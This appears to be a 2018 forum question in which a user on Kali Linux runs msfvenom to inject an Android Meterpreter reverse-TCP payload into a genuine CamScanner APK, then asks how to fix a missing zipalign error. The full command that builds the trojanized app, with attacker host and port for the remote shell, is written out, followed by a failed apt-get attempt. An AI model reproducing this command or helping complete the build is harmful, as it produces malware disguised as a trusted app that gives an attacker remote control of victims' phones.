Error: zipalign not found. If it's not in your PATH, please add it
-3
votes
1
answer
21378
views
when i try to inject payload in the apk this error occurs
root@kali:~# msfvenom -x /root/Documents/CamScanner_5.7.5.20180907.apk -p android/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=2410 -o camscanner_main.apk
Using APK template: /root/Documents/CamScanner_5.7.5.20180907.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
Error: zipalign not found. If it's not in your PATH, please add it.`
i even try apt-get install zipalign
root@kali:~# apt-get install zipalign
Reading package lists... Done
Building dependency tree
Reading state information... Done
Package zipalign is not available, but is referred to by another package.
This may mean that the package is missing,
has been obsoleted, or is only available from another source`
E: Package 'zipalign' has no installation candidate
Asked by user309136
(29 rep)
Sep 28, 2018, 05:27 PM
Last activity: Sep 30, 2018, 05:24 AM
Last activity: Sep 30, 2018, 05:24 AM